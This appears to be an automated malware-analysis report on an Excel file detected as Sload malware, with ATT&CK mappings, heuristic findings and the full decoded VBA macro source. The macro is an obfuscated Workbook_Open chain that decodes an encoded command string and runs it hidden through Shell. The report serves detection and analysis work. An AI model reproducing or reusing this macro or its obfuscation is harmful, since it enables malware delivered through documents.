MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary code. ClamAV detection confirms this as Sload malware. The VBA macro is heavily obfuscated, but the Workbook_Open and Shell() calls are clear indicators of malicious intent.
Heuristics 6
-
ClamAV: Xls.Malware.Sload-6786370-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-6786370-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4054 bytes |
SHA-256: 5918085136bf04836ee55b7cdfde877eaf0709e92a76ca7485b31452c744f946 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
pex2 = "pex2"
pex = top(pex2)
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "coprocessor"
Function top(PEXCEPTION_POINTERS)
ucontext_t.CmdLineParser = PEXCEPTION_POINTERS
End Function
Attribute VB_Name = "CYGWIN"
Function ULONG()
ucontext_t.malloc = a("m(j4)m4fdyuihzuvv4[]fdyuihzuvv4[[ka'mosd'4""u$}hois'l.4,hsbuodogv{\$'uy:d""xumo4hphou(-'uo-yu""mvsu'o{-jdy'vdgjksvu$,hsbuodogv%]] o(f _tdkoygiu-unu]]{|hogio:fidmuhh4]] o(f _tdkoygiu-unu]]|;oip\""u$]]zoof3))""mlkv-md()hj'-aty]]{;mgomz\""u$]]zoof3))a""us'm-md()hj'-aty]]{;][[424dao:ksvu4:u'mdjs'l4ghmss4:ksvufgoz4 o(f _tttttttttttttttttttt-""go|4hogio:fidmuhh4] o(f _tttttttttttttttttttt-""go]4:ys'jdyhopvu4zsjju'[")
dwVar = 2
On Error Resume Next
dwVar = CInt("30E+10000")
If dwVar = 2 Then
ucontext_t.signo = ucontext_t.malloc
End If
ULONG = 1
End Function
Attribute VB_Name = "specific"
Function a(NO_UNIX_BACKTRACE_SUPPORT)
further = ""
SIGFPE = 1
DWORD64 SIGFPE, further, NO_UNIX_BACKTRACE_SUPPORT
a = further
End Function
Function DWORD64(ByRef redistribute, ByRef low, mytstack)
licenses = Len(mytstack)
If redistribute <= licenses Then
low = low + up(Software(Right(Left(mytstack, redistribute), 1)), 4)
redistribute = redistribute + 1
DWORD64 redistribute, low, mytstack
End If
End Function
Function up(printing, settings)
If printing - settings < 1 Then
up = Right(Left(ucontext_t.SIGBUS, Len(ucontext_t.SIGBUS) + printing - settings), 1)
Else
up = Right(Left(ucontext_t.SIGBUS, printing - settings), 1)
End If
End Function
Function Software(fprintf)
bStackBelowHeap = 1
Windows1 = 1
strings bStackBelowHeap, Windows1, fprintf
Software = Windows1
End Function
Function strings(ByRef bStackBelowHeap, ByRef Windows, fprintf)
UNUSED = ucontext_t.SIGBUS
licenses = Len(UNUSED)
If bStackBelowHeap < licenses Then
If fprintf <> Right(Left(UNUSED, bStackBelowHeap), 1) Then
bStackBelowHeap = bStackBelowHeap + 1
strings bStackBelowHeap, Windows, fprintf
Else
Windows = bStackBelowHeap
End If
End If
End Function
Attribute VB_Name = "ucontext_t"
Attribute VB_Base = "0{08B9E9C0-6FFB-4718-8161-A87BACED206B}{A9B41FEF-6FD0-4F2E-9396-9B344E544D11}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub signo_Change()
without = ucontext_t.signo
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
Shell without, 0
End Sub
Private Sub CmdLineParser_Change()
ULONG
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.